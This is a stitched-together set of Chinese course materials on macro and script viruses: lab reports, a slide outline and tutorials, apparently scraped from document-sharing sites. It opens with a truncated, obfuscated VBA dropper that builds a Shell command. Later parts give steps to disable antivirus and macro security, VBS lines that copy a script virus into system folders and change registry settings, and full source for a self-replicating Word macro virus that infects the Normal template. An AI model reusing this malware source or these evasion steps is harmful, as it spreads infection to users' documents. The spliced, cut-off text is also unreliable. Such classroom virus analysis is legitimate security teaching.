CaTTBtvHd = Mid("fNzJ623CmpME4BTWDGQSANQAzAHsANQAzAFkANQAxAUXUX", 21, 22)83 fcjRIRH = CaTTBtvHd84 WOvbEmVrw = VofWHZwuw85 JozUMVXQNC = Mid("IUU0INAxAH4AMQAxADUASQAxADEANQA6ADMAMgAmADMANgAmADEAMQAyAGIAOQA3AHsAMQAxADYASQAxADAANAB+ADUAOQAhADkAOAB7ADEAMQA0AGIAMQAwADEAOgA5ADcAWQAxADAANwB86 fhXwGUGo = JozUMVXQNC87 CFJqaQFQZ = PYTsvirtV88 dnCicIqnDi = Mid("0GrwGzcA1BiqDQ2HsANAAwAHsAMwA5AH4ANAA0AG0AMwA5AEkANAAxACEANQA5AG0AMwA2ACEAMQAxADAAjNwtq8wXSXLbhwY25YY", 16, 67)89 HczVFWDHVzj = dnCicIqnDi90 JKUQBsnGw = DMHzTrwkw91 ckRwBHp = Mid("66II1QkGmQO0bkrwXG7UDHLdjDEAMAAmADkANwB6ADEAMAA5ADoAMQAwADEAegAzMiwv58sW2z8", 26, 39)92 lbjqdjR = ckRwBHp93 QjnfWnMGT = cctziOEnj94 nRJpoij = Mid("JwuGuPV1D5MOLRcplDEAMQAwAGIANAA2AGIAMQAwADAAYgAxADAAFm3RsjWO", 18, 35)95 SPEOqDL = nRJpoij96 imEQCTSBE = SPEcvKlaM97 zGITmmFi = Mid("nXkCVcOVDCIGIANQA0ACEANAAxAHsANQA5AFkAMwA2AG0AMQAxADIAOgA5ADcAewAxADEANgBJADEAMAA0AHoAMwAyAEkANgAxAG0AMwAyAHoAMwA2AFkAMQAwADEAWQAxADEAMAB6ADEAMQA4AFk98 rBTCHaK = zGITmmFi99 hdnhDuYKd = FGitvjHSw100 tkqnlH = Mid("wdHfrVfjbwADcAOgAxADEANwB7ADEAMQA1ACYANAA1AHoAMQAwADIAYgAxADAAOAB6ADEAMAAxAH4AMQAwADUAWQAxADEANQBZADkAOQAhADEAMAA0AH4AMQAwADkAYgA5ADcAYgAxADEAMAB6A11BH3 101 ScIOzQwUMHj = tkqnlH102 szdUNVjur = PzhiLEBWJ103 wzamU = Mid("whNAB6ADEAMAA4AGIANAA2AG0AOAA0AGIAMQAxADEAfgA4ADMAegAxADEANgBiADEAMQA0AG0AMQAwADUAbQAxADEAMAA6ADEAMAAzACEANAAwAG0ANAAxAHoANAA0AHoAMwAyACEAMwA2AG0A4vOqB 104 MthJuYP = wzamU105 vziJsrqMu = WYTXVcMta106 cqwMU = Mid("QjnkEoQif0vzwRUpzj9DcrA5AH4AMQAxADQAWQAxADAANQB+ADEAMQAyACEAMQAxADYAOgAzADIAWQA2ADEAbQAzADIAWQAxADEAMAAhADEAMAAxADoAMQAxADkAYgA0ADUAIQAxADEAMQBU0ntYjnSDmq 107 EbUQjFzQMji = cqwMU108 jNQSzJDJL = wWvdrZWLV109 OfVqJ = Mid("TiRt3HNPcKQFXzYzD5zBEbGwegA5ADcAIQAxADAAOQA6ADEAMAAxACYAMwAyAH4ANgAxAFkAMwAyAH4AMwA2AH4AYQhknD2", 25, 64)110 hpdwFmXNaN = OfVqJ111 PiHliAaNV = XriEVRdSI112 IwiDSbtjXNM = Mid("HqijWfnLLYUcpowUZTMNFWFwA2ADEAbQX2fLZc1w1PPk7JVF", 24, 9)113 LJIEujI = IwiDSbtjXNM114 sdzZGijtp = zshuBJHwL115 XNpKBSQp = Mid("kf6rX0J0wo7sLii6ADEAMQAxAH4AMQAxADAAJgA0ADYAWQA3ADcAYgAxADAAMQB7ADEAMQA1AFkAMQAxADUAegJ2BQk9m", 16, 71)116 LPjrKRijIw = XNpKBSQp117 SzjQrknfR = jrBdAZQdi118 jwrGYdkzCNC = Mid("AtDEANABZADEAMAA1ADoAMQAxADIAIQAxADEANgAmADQAN6f6zpUDiWd", 3, 44)119 EzTYX = jwrGYdkzCNC120 WqbZFkKbV = ncqVzZGKU121 CmzXsmGKojc = Mid("rTCDYRjjiCNAA6ADEAMAA1AH4AMQAxADYASQAxADAAMQB6ADQANQA6ADEAMAA0AGIAMQAxADEAIQAxADEANQBJADEAMQA2AEkAMwAyADoAMwA2AFkAOQA1ACYANAA2AEkANgA5ACYAMQAyADA 122 QYpwllzTSck = CmzXsmGKojc123 ZclPlaQAC = oWrIiXalF124 mAwtjzQ = Mid("dkAOgAxADAAOAA6ADEAMAA1ACEAMQAwADEAOgAxADEAMABZADEAMQA2AFkANAA2uJOYi2zO48HmdXNomG2zwpfcShY3M2zJnYLB", 2, 62)125 ZbAAifkPrvN = mAwtjzQ126 jtszGQPAD = bKtbWpErB127 oWJLO = Mid("i3TbIXnBQGAxADIAMwBZADMANgB+ADEAMQA5ACYAMQAwADEAegA5ADgAegA5ADjWE", 11, 52)128 DGLkaA = oWJLO129 zHFAIEhVF = dfwTvMTXR130 EKYFiRhEXFw = Mid("KnNUzlTmADEAMAAwADoAMQAxADEAJgAxADAAOQA6ADQANgB7ADEAMQAwADoAMQAwADEAegAxADIAMABJADEAMQA2AH4ANAAwAG0ANAA5AFkANAA0AFkAMwAyACYANQA0AG00PriiWvtTcTzBJm2 131 zSGEI = EKYFiRhEXFw132 cZWVzlXoq = JMzCDmWdd133 SFdjwWp = Mid("zPHvKMQAxADIASQA5ADcAWQAxADEANgBiADEAMAA0ACEANAAxACEANQA5AHoAOAAzADoAMQAxADYASQA5ADcASQAxADEANAA6ADEAMQA2AHoANAA1AGIAOAAwAFkAMQAxADQAYgAxADEAMQAhADk 134 OkBajT = SFdjwWp135 ziknRkKlU = EIPhIwXbR136 DcABZPAtp = Mid("Ph4HGzYkfOCGqZiwdDGa3TvRI46jLtBiSAzADkAIQA0ADYAIQAxADAAMQA6ADEAMgAwAHsAMQAwADEAJgAzADkAfgA1ADkAfgAxADAAMgA6ADEAMQAxACEAMQAxADQAegAxADAAMQAmADkANwB+ADkAOQ 137 CWMpLVkSS = DcABZPAtp138 ibHUdTOYI = FabLwRiUp139 cBUrWQJBDX = Mid("XmOJgAxADAAOAA6ADEAMQA1AGIzN3QzjhpYQj5G3IKoCPMI", 4, 23)140 lcPiAkbq = cBUrWQJBDX141 hpIlKOQSj = bbEBfbVrB142 MvpXHXC = Mid("z5nzXvB8SLdaMXOJ2AMwAyAEkANgAxACYAMwAyAGIAMwA5ACYAMQAwADQAWQAxADEANgB+ADEAMQA2AEkAMQAxADIAJgA1ADgAYgA0ADcAJgA0ADcAbQA5ADSC", 18, 103)143 HnZjzd = MvpXHXC144 WiEQYtbFL = stLzwnJqm145 vajVOP = Mid("RGKthsDsJzwtA5ADcAYgAxADAAMwBJADEAMAAxAHsANQA5AFkAMQAyADUAfgAxADIANQAnAC4AcwBQAEwAaQBUACgAIAAnAFkAJgB7AG0AOgBiACE8UDpdPzMzSYXt3P57", 13, 101)146 GzjkYUBnqXG = vajVOP147 JtQsEKnnw = DEvzqFPLp148 kEROiFMIq = Mid("j4Ja9dOW453qN2YADEAMAA5AEkZA0c3hwNX3JwzjtcQXbvF6aP", 16, 11)149 icAYwsLVpUA = kEROiFMIq150 kQQOJFDXZ = UddQropLw151 irUIcwRD = Mid("Au1EHs6ti0AmADUAOQB6ADMANgAmADEAMQA3AHsAMQAxADQA7Wj9C5z0PqNsb2IoN9LTqN", 11, 38)152 bapZdDJB = irUIcwRD153 kdaudlwYB = PtDFhmwZZ154 iFmWVaPu = Mid("AX2dCwbGzBwRzR0B9ACAAKQAtAEoATwBpAG4AJwAnACAAKQA=57cAXn5i8m8q2JvPWDXAo", 16, 34)155 KbFniuHlZAr = iFmWVaPu156 WujLpjlSJ = TnMGKiHih157 hfcbdZkXOQ = Mid("MofaM2kwYCF3hI3pREPq5wADEAWQA5ADkAhBAoZ3SX", 22, 13)158 OWGLMOBo = hfcbdZkXOQ159 OpniRlEni = VOwqRSPSQ160 zXXPDkaDCDf = Mid("UMBH8K03MAPWjNr4AA0AHsAMQAwADEAYgAxADAAOAB+ADEAMAA4AGIANQA5ACYAMwA2ACEAMQAxADkAegAxADAAMQBZADkAOAAmADkAOQB6ADEAMAA4AEkAMQAwADUAewAxADAAMQBZADEA 161 iCUMSYusIv = zXXPDkaDCDf162 OZouIKbdk = oJiYwCEkj163 pDDDLci = Mid("5l8w3MoVMQAxADQAOgA5ADcAegAxADEAMAArVwfzX20rok3a", 9, 27)164 NwSKajzAjmw = pDDDLci165 lrczHCBPD = NcVurrNsF166 cYFmodmUji = Mid("Xr8i8vwXK63tEGUAFM4fpIlA5ADcASQAxADEANgB7ADEAMAA1AGIAMQAwADEAIQAxADAANwBtADkANwBZADEAMQAwACYAMQAxADYASQAxADEAMQBiADEAMQAxAG0AMQAxADQAWQA5ADkAewAxADAA 167 kKRBFkTYOSq = cYFmodmUji168 tThcDoAPi = vzQtlhidb169 FPmzKLZZjn = Mid("UZV2SLzYBcmKjhjOAB7ADEAMAA2ADoAMQAuW61n", 16, 19)170 bYcfSuOhsf = FPmzKLZZjn171 nRRltsHOB = PtSrLGzLR172 KftEZiGv = Mid("ZOQB6ADEAMQA1AG0AOQGqcXPjVTGBVwHur", 2, 18)173 PcapUM = KftEZiGv174 CIoowrYFS = nUqoLNQZb175 CfjsS = Mid("pZPkhRPZtdoEjR3UWRwYAMQAxADIAWQAzADIAegA0ADMAegAzADIAbQAzADkASQA5ADIAegAzADkAIQAzADIAYgA0ADMAOgAzADIAJgAzADYAYgAxAoA", 21, 94)176 sbpNlLMLdC = CfjsS177 nHaoVpmlW = MEmKwaQjV178 haGppvzwpLm = Mid("MWhOm3Q1WQAxADEANgB+ADMAMgB7ADgAMwBJADEAMgAxAHsAMQAxADUASQAxADEANgB7v", 9, 59)179 wZkHuAqmza = haGppvzwpLm180Shell$ RTUHFOzsK + Chr(34) + iBSRmkhEj + XvLAfRK + PcapUM + EbUQjFzQMji + RkSMsXZmbbj + IAFUul + EzTYX + YhuVfBw + iCUMSYusIv + LJIEujI + AcOZjKGHd + bYcfSuOhsf + OWGLMOBo + wZkHuAqmza + kzLPNEjwRpi + 181End Function⼦程序中⾸先调⽤了"DMSojZquJ"模块的"KlsJVlijz"函数,函数代码经过严重混淆,但是通过函数结尾的“Shell”关键字我们猜测病毒执⾏了某个程序或命令⾏。

宏病毒分析

宏病毒分析

实验报告课程名称:计算机病毒与防治实验名称:宏病毒分析组号:第四组班级:网工19102项目负责人实验日期小组成员一、实验目的Word宏是指能组织到一起为独立命令使用的一系列Word指令,它能使日常工作变得容易。

本实验演示了宏的编写,通过两个简单的宏病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。

【注意事项】1.本病毒程序用于实验目的,面向实验演示,侧重于演示和说明病毒的内在原理,破坏功能有限。

在测试病毒程序前,需先关闭杀毒软件的自动防护功能或直接关闭杀毒软件。

2.若在个人电脑上实验,最好在虚拟机中运行。

3.测试完毕后,请注意病毒程序的清除,以免误操作破坏计算机上的其他程序。

4.请勿传播该病毒。

传播该病毒造成有用数据丢失、电脑故障甚至触犯法律等后果,由传播者负责。

二、实验要求Windows系统、word2003 等软件设置:关闭杀毒软;打开Word 2003,在工具→宏→安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic项目的访问.如图:三、实验内容1. macro virus中的内容2.计算机病毒 ---->计算机宏病毒四、实验步骤A、自我复制,感染word公用模板和当前文档打开一个word文档,然后按Alt+F11调用宏编写窗口(工具宏Visual Basic 宏编辑器),在左侧的project—>Microsoft Word对象ThisDocument中输入以上代码,保存,此时当前word文档就含有宏病毒代码截图:只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。

《宏病毒分析报告》课件

《宏病毒分析报告》课件

运用安全软件找到宏病毒
如何利用安全软件检测和定位宏病毒的存在?探讨常用安全软件中的宏病毒 检测功能及其使用。
典型宏病毒案例解析
透过典型的宏病毒案例,深入分析宏病毒的攻击方式、目标以及对受害者造成的影响。
宏病毒的防范措施
根据宏病毒的特点和传播方式,制定恰当的宏病毒防范措施,确保计算机系统的安全。
宏病毒的传播途径
宏病毒是如何传播的?了解它利用哪些途径侵入计算机系统,以及如何避免 宏病毒的传播。
宏病毒的目标
宏病毒主要攻击什么类型的文件和系统?了解宏病毒对不同目标的影响及其 潜在威胁。
宏病毒的特点
宏病毒的其他病毒的区别。
宏病毒的危害
《宏病毒分析报告》PPT 课件
这份《宏病毒分析报告》PPT课件将带您深入了解宏病毒的定义、传播途径、 分类、危害以及防范措施。让我们一起探索这个隐藏在电脑中的隐患。
病毒概述
什么是宏病毒?了解病毒及其分类的基本概念,以及宏病毒在计算机系统中的角色和功能。
发现宏病毒的原因
为什么宏病毒成为计算机系统中的威胁?探讨宏病毒被发现的背后原因,以 及可能导致宏病毒感染的行为和情境。
宏病毒属于哪种威胁
将宏病毒与其他计算机安全威胁进行对比,了解宏病毒在黑客攻击和信息安全中的角色和影响。
如何保护电脑避免宏病毒
学习保护计算机免受宏病毒感染的最佳实践,包括使用防病毒软件、限制宏 病毒的执行和保持操作系统更新。
防范宏病毒的建议
了解有效的防范宏病毒的方法和策略,以及避免宏病毒传播的最佳实践。
宏病毒常见的攻击方式
宏病毒如何达到其攻击目的?探索宏病毒常见的攻击方式,以及如何应对和 防范这些攻击手法。
可能会感染宏病毒的文件类型
宏病毒可能感染哪些常见的文件类型?了解宏病毒针对的文件扩展名以及宏病毒在这些文件中的隐藏方式。

电脑宏病毒实验

电脑宏病毒实验

电脑宏病毒实验
电脑宏病毒实验
演示宏的编写。

说明宏的原理及其安全漏洞缺陷。

理解宏病毒的作用机制。

下面是店铺收集整理的电脑宏病毒实验,希望对大家有帮助~~
电脑宏病毒实验
工具/原料
1、 Windows 系列操作系统
2、 Word2003应用程
方法/步骤
软件设置:关闭杀毒软件的自我防护功能。

打开word2003,选择“工具”|“宏”|“安全性”|命令,在弹出的对话框中将安全级别设置为低,在可靠发行商选项卡中,选择信任所有安装的加载项和模板,选择信任visual basic 项目的访问。

演示自我复制功能:打开或新建一个Word文档,ALT+F11快捷键进入宏编写窗口在Project|Microsoft word对象|ThisDocument中编辑实验源代码
保存文档重新打开文档将跳出一个窗口
4、宏病毒的删除
按Alt+f11快捷键进入宏的编辑窗口,分别删除Nomal和Project 里的this document,将其中的代码删除并保存,再次打开文档后宏病毒将不再运行。

L002003012-脚本病毒编写实验

L002003012-脚本病毒编写实验
第八行至第十行语句的作用依次为复制病毒文件夹道Windows文件夹、system32文件夹、启动菜单。
第十一行至第十五行语句的作用依次为禁止“运行”菜单、禁止使用注册表编辑器、禁止注销菜单、开机自动运行以及禁止右键菜单。
第十六行至第十八行语句的作用依次为禁用IE右键菜单、禁止Internet选项、设置默认主页为。
18 r.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page","/?cc62"
分析各条语句含义。主要语句的含义分析如下:
第一行语句的含义是启用错误处理程序,目的在于为了当程序发生错误的时候忽略错误而继续向下执行,从而不要打断程序的执行流程,保证后面的代码可以执行成功。
vbs脚本病毒生成器1.0版
预备知识
脚本与脚本病毒
脚本病毒通常是JavaScript代码编写的恶意代码,一般带有广告性质,会修改您的IE首页、修改注册表等信息,造成用户使用计算机不方便。
脚本病毒的原理分析与防范
脚本病毒的共有特性:
脚本病毒的前缀是:Script。脚本病毒的公有特性是使用脚本语言编写,通过网页进行的传播的病毒,如红色代码(Script.Redlof)脚本病毒通常有如下前缀:VBS、JS(表明是何种脚本编写的),如欢乐时光(VBS.Happytime)、十四日(Js.Fortnight.c.s)等。
6 dim r
7 Set r=CreateObject("Wscript.Shell")
8 so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Win32system.vbs")

宏病毒共性及分析介绍:

宏病毒共性及分析介绍:

宏病毒共性及分析介绍:电脑病毒宏病毒具有一些共性什么共性呢!下面由店铺给你做出详细的宏病毒共性及分析介绍!希望对你有帮助!欢迎回访店铺网站,谢谢!宏病毒共性及分析介绍:1,以往病毒只感染程序,不感染数据文件,而宏病毒专门感染数据文件,彻底改变了人们的“数据文件不会传播病毒”的错误认识。

宏病毒会感染.DOC文档文件和.DOT模板文件。

被它感染的.DOC文档属性必然会被改为模板而不是文档,但不一定修改文件的扩展名。

而用户在另存文档时,就无法将该文档转换为任何其他方式,而只能用模板方式存盘。

这一点在多种文本编辑器需转换文档时是绝对不允许的。

2,染毒文档无法使用“另存为(SaveAs)”修改路径以保存到另外的磁盘/子目录中。

3,病毒宏的传染通常是Word在打开一个带宏病毒的文档或模板时,激活了病毒宏,病毒宏将自身复制至Word的通用(Normal)模板中,以后在打开或关闭文件时病毒宏就会把病毒复制到该文件中。

4,大多数宏病毒中含有AutoOpen,AutoClose,AutoNew和AutoExit等自动宏。

只有这样,宏病毒才能获得文档(模板)操作控制权。

有些宏病毒还通过FileNew,FileOpen,FileSave,FileSaveAs,FileExit等宏控制文件的操作。

5,病毒宏中必然含有对文档读写操作的宏指令。

6,宏病毒在.DOC文档、.DOT模板中是以BFF(BinaryFileFormat)格式存放,这是一种加密压缩格式,每种Word版本格式可能不兼容。

7病毒分析编辑宏病毒传播途径主要有:1,软盘交流染毒文档文件;2,硬盘染毒,处理的文档文件必将染毒;3,光盘携带宏病毒;4,Internet上下载染毒文档文件;5,BBS交流染毒文档文件;6,电子邮件的附件夹带病毒。

两支宏病毒分析1,Nuclear宏病毒这是一个对操作系统文件和打印输出有破坏功能的宏病毒。

这个宏病毒中包含以下病毒宏:AutoExecAutoOpenDropSurivFileExitFilePrintFilePrintDefaultFile SaveAsInsertPayloadPayload这些宏是只执行(Execute-only)宏。

(完整word版)脚本病毒实验(word文档良心出品)

(完整word版)脚本病毒实验(word文档良心出品)

脚本病毒实验【实验内容】脚本实验平台根据用户指定需求,自动生成脚本病毒代码,并在界面中呈现给用户,用户可以编辑代码,运行脚本,观察脚本运行现象,并分析脚本实现,脚本实验具体内容包括:(1)复制病毒副本到系统文件夹;(2)复制病毒副本到启动菜单;(3)禁止“运行”菜单;(4)禁止“关闭系统”菜单;(5)禁止显示桌面所有图标;(6)禁止“任务栏”和“开始”;(7)禁止“控制面板”;(8)修改“IE”默认页。

【实验原理】脚本病毒通常是JavaScript或VBScript等语言编写的恶意代码,一般带有广告性质,会修改IE首页、修改注册表等信息,对用户计算机造成破坏。

通过网页进行的传播的病毒较为典型,脚本病毒还会有如下前缀:VBS、JS(表明是何种脚本编写的),如欢乐时光(VBS.Happytime)、十四日(Js.Fortnight.c.s)、红色代码(Script.Redlof)等。

典型的脚本病毒通过邮件方式进行传播,如图2.4.1-1所示的代码为病毒通过向Outlook 中的地址簿中联系人地址发送邮件,从而将病毒代码以附件的形式广泛传播到互联网其它主机。

图2.4.1-1【实验环境】Windows实验台【实验步骤】打开Windows实验台,点击桌面“病毒实验”,选择“脚本病毒实验”,进入其实施面板,如图2.4.1-2所示。

图2.4.1-2一、脚本病毒代码分析和查看分别选择相应的脚本文件,学生用户即可查看脚本病毒代码。

在界面左侧功能选择区选择实验名称,用户在界面右侧将会看到该脚本病毒的全部代码。

如图2.4.1-3所示。

图2.4.1-3学生用户如需要编辑脚本病毒代码,用户在界面右侧将会看到该脚本病毒的全部代码,在此基础上编辑代码,将会生成用户自定义的脚本病毒,点击“保存脚本”按钮将把编辑好的脚本文件永久保存,如果编辑过程出现错误或者异常,点击“重置脚本”将恢复最初的脚本代码。

实验进行前,要先点击“初始化病毒工具”按钮,对其实验所需的工具进行初始化;在实验过程中,如果所需的工具被杀毒软件查杀,要再次点击“初始化病毒工具”按钮,对工具重新进行初始化,以便实验顺利进行。

GF脚本病毒

GF脚本病毒

西安邮电大学 通信与信息工程学院 网络攻防实验报告 专业班级: 学生姓名: 学号(班内序号): 2014 年 5 月 14 日——————————————————————————装订线————————————————————————————————报告份数:脚本及恶意文件病毒1.场景描述在虚拟机系统当中建立相关脚本病毒的文件,以及进行相关操作。

备注:所用工具(D盘-->攻防工具包-->脚本及恶意文件病毒:创建.txt、拷贝.txt、删除.txt、修改.txt)2.实验目的1).了解脚本及恶意网页的运行环境,运行平台,语言基础及传播手段2).掌握脚本及恶意网页的基本防范方法和手工处理技巧3).通过实验中对典型脚本病毒及恶意网页的分析,掌握判断未知脚本病毒及其处理能力3.需求分析通过在一些网页上写一些隐藏的危害代码来达到目的,代码隐藏得越深,越难发现。

我们得通过一些常见的隐藏手段来学习发现危害代码。

4.技术分析计算机脚本病毒同样具有计算机病毒通常都具有的所有特征,如自我复制性、传播性、潜伏性、破坏性等。

计算机脚本病毒的产生得益于操作系统和应用系统对脚本技术的无节制的滥用。

通常,在任何一个操作系统和应用系统中都存在一定的安全机制,但为了实现对系统的控制和易用性,这些安全机制对脚本程序的行为都缺乏控制,也就是对脚本开发语言的使用行为缺乏控制。

脚本语言的前身实际上就是DOS系统下的批处理文件,只是批处理文件和现在的脚本语言相比简单了一些。

脚本的应用是对应用系统的一个强大的支撑,需要一个运行环境。

现在比较流行的脚本语言有:UNIX/Linux Shell,Pert,VBScript,JavaScript,JSP,PHP等。

由于现在流行的脚本计算机病毒大都是利用JavaScript和VBScript脚本语言编写,因此这里重点介绍一下这两种脚本语言。

1).JavaScript和VBScript脚本语言介绍JavaScript是一种解释型的、基于对象的脚本语言,是Microsoft公司对ECMA262语言规范的一种实现。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

实验三脚本病毒和宏病毒分析
一、实验目的
通过这项实验旨在使学生掌握Office下宏病毒的基本原理,主要包括它的传染机制、破坏机制以及怎样清除Office下的宏病毒。

二、实验环境
操作系统环境:Windows98/NT/2000/XP 编程环境:Office VBA
三、实验基础知识要求
Office VBA编程环境
四、实验任务
1.任务性质:验证性实验
2.任务描述:下面的示例中给出的是一个Word宏病毒的示例程序(只有传染模块),仔细阅读源程序,掌握Word宏病毒的传染过程。

3.任务步骤:
(1)打开Word2000,新建一个文档名为“test”;
(2)点击“工具-宏-宏”,在对话框“宏的位置”选择“test”,在宏名中输入“autoclose”,然后点击“创建”按钮;
(3)在VBA编辑环境中输入示例程序中给出的代码,并保存,然后退出VBA;
(4)点击“工具-宏-宏”,在对话框中点击“管理器”按钮,在管理器对话框中点击“宏方案项”标签;在宏方案项有效范围的“test.doc”中将“NewMacros”改名为“AOPEDMOK”;
(5)点击“工具-宏-安全性”,在安全性对话框中的安全级标签中选择“低”,在可靠性来源标签中选择“信任对VB项目的访问”;
(6)保存并关闭“test”文档;
(7)新建一个文档test1,关闭后重新打开,观察test1是否被感染。

(8)清除此宏病毒,即要同时删除normal模板、所有活动模板、和染毒文件的autoclose 宏。

4.示例程序
Sub autoclose()
' autoclose Macro
' 宏在2005-8-26 由jingjd 创建
On Error Resume Next
Application.DisplayAlerts = wdAlertsNone
Application.EnableCancelKey = wdCancelDisabled
Application.DisplayStatusBar = False
'Options.VirusProtection = False
Options.SaveNormalPrompt = False
Const VirusName = "AOPEDMOK"
'MsgBox ActiveDocument.VBProject.VBComponents.Item(2).Name
'MsgBox ActiveDocument.VBProject.VBComponents(2).Name
Set Doc = ActiveDocument.VBProject.VBComponents
Set Tmp = NormalTemplate.VBProject.VBComponents
Const ExportSource = "E:\aopedmok.txt"
For j = 1 To Doc.Count
If Doc(j).Name = VirusName Then
DocInstalled = 1
Doc(j).Export ExportSource
End If
Next j
For i = 1 To Tmp.Count
If Tmp(i).Name = VirusName Then
TmpInstalled = 1
Tmp(i).Export ExportSource
End If
Next i
If TmpInstalled = 0 Then
Tmp.Import ExportSource
NormalTemplate.Save
End If
If DocInstalled = 0 Then
Doc.Import ExportSource
ActiveDocument.SaveAs ActiveDocument.FullName End If
MsgBox "HaHa,you are attacked!", 0, "Word,Macro"
End Sub
五、实验报告要求
1.写出实验过程和病毒感染后的现象;
2.试分析宏病毒的破坏模块应该怎样编写;
3.总结宏病毒的预防方法。

相关文档
最新文档